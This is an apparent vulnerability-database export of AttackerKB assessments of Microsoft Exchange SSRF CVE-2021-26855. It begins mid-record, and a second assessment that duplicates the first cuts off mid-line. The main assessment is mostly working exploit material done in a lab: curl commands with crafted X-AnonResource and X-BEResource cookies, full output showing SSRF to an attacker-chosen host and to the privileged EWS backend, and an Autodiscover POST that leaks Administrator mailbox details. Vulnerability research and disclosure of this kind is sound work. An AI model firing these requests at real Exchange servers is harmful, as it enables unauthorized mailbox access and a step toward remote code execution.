"2021-08-20T00:00:00", "type": "attackerkb", "title": "ProxyShell Exploit Chain", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-20T00:00:00", "id": "AKB:116FDAE6-8C6E-473E-8D39-247560D01C09", "href": "https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-18T16:43:32", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.\n\n \n**Recent assessments:** \n \n**wvu-r7** at March 09, 2021 7:01am UTC reported:\n\n# CVE-2021-26855\n\n[CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>) is an SSRF vulnerability in Exchange that allows privileged access to Exchange\u2019s backend resources, ultimately leading to pre-auth RCE when [combined](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) with CVEs such as [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>).\n\n## Microsoft\u2019s (Nmap) NSE script\n\nConveniently disclosed in Microsoft\u2019s [alternative mitigations](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>), [this script](<https://github.com/microsoft/CSS-Exchange/blob/main/Security/http-vuln-cve2021-26855.nse>) provides an easily reproducible PoC for CVE-2021-26855. My findings below are reflective of that.\n \n \n wvu@kharak:~/Downloads$ ls\n http-vuln-cve2021-26855.nse\n wvu@kharak:~/Downloads$ nmap -Pn -T4 -n -v -p 443 --open --script http-vuln-cve2021-26855 192.168.123.183\n Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.\n Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-09 00:50 CST\n NSE: Loaded 1 scripts for scanning.\n NSE: Script Pre-scanning.\n Initiating NSE at 00:50\n Completed NSE at 00:50, 0.00s elapsed\n Initiating Connect Scan at 00:50\n Scanning 192.168.123.183 [1 port]\n Discovered open port 443/tcp on 192.168.123.183\n Completed Connect Scan at 00:50, 0.00s elapsed (1 total ports)\n NSE: Script scanning 192.168.123.183.\n Initiating NSE at 00:50\n Completed NSE at 00:50, 0.02s elapsed\n Nmap scan report for 192.168.123.183\n Host is up (0.00064s latency).\n \n PORT STATE SERVICE\n 443/tcp open https\n | http-vuln-cve2021-26855:\n | VULNERABLE:\n | Exchange Server SSRF Vulnerability\n | State: VULNERABLE\n | IDs: CVE:CVE-2021-26855\n | Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010 are vulnerable to a SSRF via the X-AnonResource-Backend and X-BEResource cookies.\n |\n | Disclosure date: 2021-03-02\n | References:\n | https://vulners.com/cve/CVE-2021-26855\n |_ http://aka.ms/exchangevulns\n \n NSE: Script Post-scanning.\n Initiating NSE at 00:50\n Completed NSE at 00:50, 0.00s elapsed\n Read data files from: /usr/local/bin/../share/nmap\n Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds\n wvu@kharak:~/Downloads$\n \n\n### Ported to [curl(1)](<https://curl.se/>)\u2026\n \n \n wvu@kharak:~$ curl -kvb \"X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;\" https://192.168.123.183/owa/auth/x.js\n * Trying 192.168.123.183...\n * TCP_NODELAY set\n * Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7f8cb580b400)\n > GET /owa/auth/x.js HTTP/2\n > Host: 192.168.123.183\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n < HTTP/2 500\n < cache-control: private\n < content-type: text/html; charset=utf-8\n < server: Microsoft-IIS/10.0\n < request-id: 864475e3-ee01-48a5-acf3-1b1cbbc50c02\n < x-calculatedbetarget: localhost\n < x-calculatedbetarget: localhost\n < x-feserver: WIN-T4RO9496TA7\n < x-aspnet-version: 4.0.30319\n < x-powered-by: ASP.NET\n < date: Tue, 09 Mar 2021 06:52:07 GMT\n < content-length: 85\n <\n * Connection #0 to host 192.168.123.183 left intact\n NegotiateSecurityContext failed with for host 'localhost' with status 'TargetUnknown'* Closing connection 0\n wvu@kharak:~$\n \n\n## SSRF to an arbitrary remote host\n\nYou can specify an arbitrary host in `X-AnonResource-Backend`.\n \n \n wvu@kharak:~$ curl -kvb \"X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~$RANDOM\" \"https://192.168.123.183/owa/auth/$RANDOM.js\"\n * Trying 192.168.123.183...\n * TCP_NODELAY set\n * Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7f9ea080d600)\n > GET /owa/auth/22702.js HTTP/2\n > Host: 192.168.123.183\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~4563\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n \n\n### Catching the request in [ncat(1)](<https://nmap.org/ncat/>)\u2026\n \n \n wvu@kharak:~$ ncat -lkv --ssl 443\n Ncat: Version 7.91 ( https://nmap.org/ncat )\n Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.\n Ncat: SHA-1 fingerprint: F55B E690 D8F2 84F1 EC64 816A 5763 2F5B B56F 0D72\n Ncat: Listening on :::443\n Ncat: Listening on 0.0.0.0:443\n Ncat: Connection from 192.168.123.183.\n Ncat: Connection from 192.168.123.183:6303.\n GET /owa/auth/22702.js HTTP/1.1\n X-FE-ClientIP: 192.168.123.1\n X-Forwarded-For: 192.168.123.1\n X-Forwarded-Port: 55723\n X-MS-EdgeIP:\n X-ExCompId: ClientAccessFrontEnd\n Accept: */*\n User-Agent: curl/7.64.1\n X-OriginalRequestHost: 192.168.123.183\n X-OriginalRequestHostSchemePort: 443:https:192.168.123.183\n X-MSExchangeActivityCtx: V=1.0.0.0;Id=26678ebf-2d0f-42bd-bac3-2d27889baed8;C=;P=\n msExchProxyUri: https://192.168.123.183/owa/auth/22702.js\n X-IsFromCafe: 1\n X-SourceCafeServer: WIN-T4RO9496TA7.GIBSON.LOCAL\n X-CommonAccessToken: VgEAVAlBbm9ueW1vdXNDAEUAAAAA\n X-vDirObjectId: 621dccd3-6dff-49aa-87be-7911a110125e\n Host: 192.168.123.1\n Cookie: X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~4563\n Connection: Keep-Alive\n \n\nThe fun folks working on the [Nuclei scanner](<https://github.com/projectdiscovery/nuclei>) noticed [burpcollaborator.net](<https://burpcollaborator.net/>) made a [good target](<https://github.com/projectdiscovery/nuclei-templates/pull/1032>) for their scanner.\n \n \n wvu@kharak:~$ curl -kvb \"X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net~$RANDOM\" \"https://192.168.123.183/owa/auth/$RANDOM.js\"\n * Trying 192.168.123.183...\n * TCP_NODELAY set\n * Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7fd58480f600)\n > GET /owa/auth/18409.js HTTP/2\n > Host: 192.168.123.183\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net~31368\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n < HTTP/2 200\n < cache-control: private\n < content-type: text/html\n < server: Microsoft-IIS/10.0\n < request-id: 31688df5-982d-4d18-86d1-ae0e99c00ce8\n < x-calculatedbetarget: burpcollaborator.net\n < x-collaborator-version: 4\n < x-aspnet-version: 4.0.30319\n < x-powered-by: ASP.NET\n < date: Tue, 09 Mar 2021 07:58:52 GMT\n < content-length: 1190\n <\n <!DOCTYPE html>\n <html>\n <head>\n <meta charset=\"UTF-8\">\n </head>\n <body>\n <h1>Burp Collaborator Server</h1>\n <p>Burp Collaborator is a service that is used by <a href=\"https://portswigger.net/burp/\">Burp Suite</a> when testing web applications for security\n vulnerabilities. Some of Burp Suite's tests may cause the application being\n tested to interact with the Burp Collaborator server, to enable Burp Suite\n to detect various security vulnerabilities.\n </p><p>The Burp Collaborator server does not itself initiate any interactions with\n any system, and only responds to interactions that it receives from other\n systems.\n </p><p>If you are a systems administrator and you are seeing interactions with the\n Burp Collaborator server in your logs, then it is likely that someone is\n testing your web application using Burp Suite. If you are trying to identify\n the person responsible for this testing, you should review your web server\n or applications logs for the time at which these interactions were initiated\n by your systems.\n </p><p>For further details about Burp Collaborator, please see the <a href=\"https://portswigger.net/burp/documentation/collaborator/\">full documentation</a>.</p></body>\n * Connection #0 to host 192.168.123.183 left intact\n </html>* Closing connection 0\n wvu@kharak:~$\n \n\n## SSRF to a privileged backend resource\n\nHostname `WIN-T4RO9496TA7` is from the `x-feserver` header.\n \n \n wvu@kharak:~$ curl -kvb \"X-BEResource=WIN-T4RO9496TA7/EWS/Exchange.asmx?~$RANDOM\" \"https://192.168.123.183/ecp/$RANDOM.js\"\n * Trying 192.168.123.183...\n * TCP_NODELAY set\n * Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7faac2808200)\n > GET /ecp/1849.js HTTP/2\n > Host: 192.168.123.183\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-BEResource=WIN-T4RO9496TA7/EWS/Exchange.asmx?~22406\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n < HTTP/2 200\n < cache-control: private\n < content-type: text/html; charset=UTF-8\n < server: Microsoft-IIS/10.0\n < request-id: b4762a11-d418-43f8-a435-f04420289a4c\n < x-calculatedbetarget: win-t4ro9496ta7\n < x-calculatedbetarget: win-t4ro9496ta7.gibson.local\n < x-diaginfo: WIN-T4RO9496TA7\n < x-beserver: WIN-T4RO9496TA7\n < x-feserver: WIN-T4RO9496TA7\n < x-aspnet-version: 4.0.30319\n < set-cookie: exchangecookie=ef4d50599057429b849b92e9059455af; expires=Wed, 09-Mar-2022 07:00:11 GMT; path=/; HttpOnly\n < set-cookie: X-BackEndCookie=S-1-5-18=rJqNiZqNgai2sdKry62wxsvGyau+yNGYlp2MkJHRk5CcnpOBzsbLzc/JzM3MzYHNz83O0s/M0s/Gq8/Ixc7Pxc7O; expires=Tue, 09-Mar-2021 07:10:11 GMT; path=/EWS; secure; HttpOnly\n < x-powered-by: ASP.NET\n < x-feserver: WIN-T4RO9496TA7\n < date: Tue, 09 Mar 2021 07:00:11 GMT\n < content-length: 2836\n <\n <HTML lang=\"en\"><HEAD><link rel=\"alternate\" type=\"text/xml\" href=\"https://win-t4ro9496ta7.gibson.local:444/EWS/Exchange.asmx?disco\"/><STYLE type=\"text/css\">#content{ FONT-SIZE: 0.7em; PADDING-BOTTOM: 2em; MARGIN-LEFT: 30px}BODY{MARGIN-TOP: 0px; MARGIN-LEFT: 0px; COLOR: #000000; FONT-FAMILY: Verdana; BACKGROUND-COLOR: white}P{MARGIN-TOP: 0px; MARGIN-BOTTOM: 12px; COLOR: #000000; FONT-FAMILY: Verdana}PRE{BORDER-RIGHT: #f0f0e0 1px solid; PADDING-RIGHT: 5px; BORDER-TOP: #f0f0e0 1px solid; MARGIN-TOP: -5px; PADDING-LEFT: 5px; FONT-SIZE: 1.2em; PADDING-BOTTOM: 5px; BORDER-LEFT: #f0f0e0 1px solid; PADDING-TOP: 5px; BORDER-BOTTOM: #f0f0e0 1px solid; FONT-FAMILY: Courier New; BACKGROUND-COLOR: #e5e5cc}.heading1{MARGIN-TOP: 0px; PADDING-LEFT: 15px; FONT-WEIGHT: normal; FONT-SIZE: 26px; MARGIN-BOTTOM: 0px; PADDING-BOTTOM: 3px; MARGIN-LEFT: -30px; WIDTH: 100%; COLOR: #ffffff; PADDING-TOP: 10px; FONT-FAMILY: Tahoma; BACKGROUND-COLOR: #003366}.intro{display: block; font-size: 1em;}</STYLE><TITLE>Service</TITLE></HEAD><BODY><DIV id=\"content\" role=\"main\"><h1 class=\"heading1\">Service</h1><BR/><P class=\"intro\">You have created a service.<P class='intro'>To test this service, you will need to create a client and use it to call the service. You can do this using the svcutil.exe tool from the command line with the following syntax:</P> <BR/><PRE>svcutil.exe <A HREF=\"https://win-t4ro9496ta7.gibson.local:444/EWS/Services.wsdl\">https://win-t4ro9496ta7.gibson.local:444/EWS/Services.wsdl</A></PRE></P><P class=\"intro\">This will generate a configuration file and a code file that contains the client class. Add the two files to your client application and use the generated client class to call the Service. For example:<BR/></P><h2 class='intro'>C#</h2><br /><PRE><font color=\"blue\">class </font><font color=\"black\">Test\n </font>{\n <font color=\"blue\"> static void </font>Main()\n {\n <font color=\"black\">HelloClient</font> client = <font color=\"blue\">new </font><font color=\"black\">HelloClient</font>();\n \n <font color=\"darkgreen\"> // Use the 'client' variable to call operations on the service.\n \n </font><font color=\"darkgreen\"> // Always close the client.\n </font> client.Close();\n }\n }\n </PRE><BR/><h2 class='intro'>Visual Basic</h2><br /><PRE><font color=\"blue\">Class </font><font color=\"black\">Test\n </font><font color=\"blue\"> Shared Sub </font>Main()\n <font color=\"blue\"> Dim </font>client As <font color=\"black\">HelloClient</font> = <font color=\"blue\">New </font><font color=\"black\">HelloClient</font>()\n <font color=\"darkgreen\"> ' Use the 'client' variable to call operations on the service.\n \n </font><font color=\"darkgreen\"> ' Always close the client.\n </font> client.Close()\n <font color=\"blue\"> End Sub\n * Connection #0 to host 192.168.123.183 left intact\n </font><font color=\"blue\">End Class</font></PRE></DIV></BODY></HTML>* Closing connection 0\n wvu@kharak:~$\n \n\n`POST`ing to the [EWS](<https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/ews-reference-for-exchange>) endpoint (not shown) allows an attacker access to a target\u2019s mailbox. A sample [Autodiscover request](<https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/pox-autodiscover-request-for-exchange>) is shown below.\n \n \n wvu@kharak:~/Downloads$ cat poc.xml\n <?xml version=\"1.0\"?>\n <Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\">\n <Request>\n <EMailAddress>Administrator@gibson.local</EMailAddress>\n <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>\n </Request>\n </Autodiscover>\n wvu@kharak:~/Downloads$ curl -kvb \"X-BEResource=WIN-T4RO9496TA7/autodiscover/autodiscover.xml?~$RANDOM\" -H \"Content-Type: text/xml\" \"https://192.168.123.207/ecp/$RANDOM.js\" -d @poc.xml\n * Trying 192.168.123.207...\n * TCP_NODELAY set\n * Connected to 192.168.123.207 (192.168.123.207) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7fa592808200)\n > POST /ecp/3425.js HTTP/2\n > Host: 192.168.123.207\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-BEResource=WIN-T4RO9496TA7/autodiscover/autodiscover.xml?~24753\n > Content-Type: text/xml\n > Content-Length: 354\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n * We are completely uploaded and fine\n < HTTP/2 200\n < cache-control: private\n < content-type: text/xml; charset=utf-8\n < server: Microsoft-IIS/10.0\n < request-id: bde5e90a-fe14-4b47-aaca-1a713d9832b1\n < x-calculatedbetarget: win-t4ro9496ta7\n < x-calculatedbetarget: win-t4ro9496ta7.gibson.local\n < x-diaginfo: WIN-T4RO9496TA7\n < x-beserver: WIN-T4RO9496TA7\n < x-feserver: WIN-T4RO9496TA7\n < x-aspnet-version: 4.0.30319\n < set-cookie: X-BackEndCookie=S-1-5-18=rJqNiZqNgai2sdKry62wxsvGyau+yNGYlp2MkJHRk5CcnpOBzsbLzc/JzM3MzYHNz83O0s/M0s7Pq8/OxczJxc7G; expires=Wed, 10-Mar-2021 01:36:19 GMT; path=/autodiscover; secure; HttpOnly\n < x-powered-by: ASP.NET\n < x-feserver: WIN-T4RO9496TA7\n < date: Wed, 10 Mar 2021 01:26:19 GMT\n < content-length: 3866\n <\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/responseschema/2006\">\n <Response xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a\">\n <User>\n <DisplayName>Administrator</DisplayName>\n <LegacyDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=94812d66d68146e8b6ac7b3312a93d7b-Admin</LegacyDN>\n <AutoDiscoverSMTPAddress>Administrator@gibson.local</AutoDiscoverSMTPAddress>\n <DeploymentId>eb64d327-1a67-4c9c-b64d-38d567e95480</DeploymentId>\n </User>\n <Account>\n <AccountType>email</AccountType>\n <Action>settings</Action>\n <MicrosoftOnline>False</MicrosoftOnline>\n <Protocol>\n <Type>EXCH</Type>\n <Server>47f3c51d-2094-4651-b009-c4c4a86a75e4@gibson.local</Server>\n <ServerDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=47f3c51d-2094-4651-b009-c4c4a86a75e4@gibson.local</ServerDN>\n <ServerVersion>73C18880</ServerVersion>\n <MdbDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=47f3c51d-2094-4651-b009-c4c4a86a75e4@gibson.local/cn=Microsoft Private MDB</MdbDN>\n <PublicFolderServer>win-t4ro9496ta7.gibson.local</PublicFolderServer>\n <AD>WIN-T4RO9496TA7.gibson.local</AD>\n <ASUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</ASUrl>\n <EwsUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</EwsUrl>\n <EmwsUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</EmwsUrl>\n <EcpUrl>https://win-t4ro9496ta7.gibson.local/owa/</EcpUrl>\n <EcpUrl-um>?path=/options/callanswering</EcpUrl-um>\n <EcpUrl-aggr>?path=/options/connectedaccounts</EcpUrl-aggr>\n <EcpUrl-mt>options/ecp/PersonalSettings/DeliveryReport.aspx?rfr=olk&exsvurl=1&IsOWA=<IsOWA>&MsgID=<MsgID>&Mbx=<Mbx>&realm=gibson.local</EcpUrl-mt>\n <EcpUrl-ret>?path=/options/retentionpolicies</EcpUrl-ret>\n <EcpUrl-sms>?path=/options/textmessaging</EcpUrl-sms>\n <EcpUrl-photo>?path=/options/myaccount/action/photo</EcpUrl-photo>\n <EcpUrl-tm>options/ecp/?rfr=olk&ftr=TeamMailbox&exsvurl=1&realm=gibson.local</EcpUrl-tm>\n <EcpUrl-tmCreating>options/ecp/?rfr=olk&ftr=TeamMailboxCreating&SPUrl=<SPUrl>&Title=<Title>&SPTMAppUrl=<SPTMAppUrl>&exsvurl=1&realm=gibson.local</EcpUrl-tmCreating>\n <EcpUrl-tmEditing>options/ecp/?rfr=olk&ftr=TeamMailboxEditing&Id=<Id>&exsvurl=1&realm=gibson.local</EcpUrl-tmEditing>\n <EcpUrl-extinstall>?path=/options/manageapps</EcpUrl-extinstall>\n <OOFUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</OOFUrl>\n <UMUrl>https://win-t4ro9496ta7.gibson.local/EWS/UM2007Legacy.asmx</UMUrl>\n <ServerExclusiveConnect>off</ServerExclusiveConnect>\n </Protocol>\n <Protocol>\n <Type>EXPR</Type>\n <Server>win-t4ro9496ta7.gibson.local</Server>\n <SSL>Off</SSL>\n <AuthPackage>Ntlm</AuthPackage>\n <ServerExclusiveConnect>on</ServerExclusiveConnect>\n <CertPrincipalName>None</CertPrincipalName>\n <GroupingInformation>Default-First-Site-Name</GroupingInformation>\n </Protocol>\n <Protocol>\n <Type>WEB</Type>\n <Internal>\n <OWAUrl AuthenticationMethod=\"Basic, Fba\">https://win-t4ro9496ta7.gibson.local/owa/</OWAUrl>\n <Protocol>\n <Type>EXCH</Type>\n <ASUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</ASUrl>\n </Protocol>\n </Internal>\n </Protocol>\n </Account>\n </Response>\n * Connection #0 to host 192.168.123.207 left intact\n </Autodiscover>* Closing connection 0\n wvu@kharak:~/Downloads$\n \n\n**cdelafuente-r7** at March 24, 2021 2:49pm UTC reported:\n\n# CVE-2021-26855\n\n[CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>) is an SSRF vulnerability in Exchange that allows privileged access to Exchange\u2019s backend resources, ultimately leading to pre-auth RCE when [combined](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) with CVEs such as [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>).\n\n## Microsoft\u2019s (Nmap) NSE script\n\nConveniently disclosed in Microsoft\u2019s [alternative mitigations](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>), [this script](<https://github.com/microsoft/CSS-Exchange/blob/main/Security/http-vuln-cve2021-26855.nse>) provides an easily reproducible PoC for CVE-2021-26855. My findings below are reflective of that.\n \n \n wvu@kharak:~/Downloads$ ls\n http-vuln-cve2021-26855.nse\n wvu@kharak:~/Downloads$ nmap -Pn -T4 -n -v -p 443 --open --script http-vuln-cve2021-26855 192.168.123.183\n Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.\n Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-09 00:50 CST\n NSE: Loaded 1 scripts for scanning.\n NSE: Script Pre-scanning.\n Initiating NSE at 00:50\n Completed NSE at 00:50, 0.00s elapsed\n Initiating Connect Scan at 00:50\n Scanning 192.168.123.183 [1 port]\n Discovered open port 443/tcp on 192.168.123.183\n Completed Connect Scan at 00:50, 0.00s elapsed (1 total ports)\n NSE: Script scanning 192.168.123.183.\n Initiating NSE at 00:50\n Completed NSE at 00:50, 0.02s elapsed\n Nmap scan report for 192.168.123.183\n Host is up (0.00064s latency).\n \n PORT STATE SERVICE\n 443/tcp open https\n | http-vuln-cve2021-26855:\n | VULNERABLE:\n | Exchange Server SSRF Vulnerability\n | State: VULNERABLE\n | IDs: CVE:CVE-2021-26855\n | Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 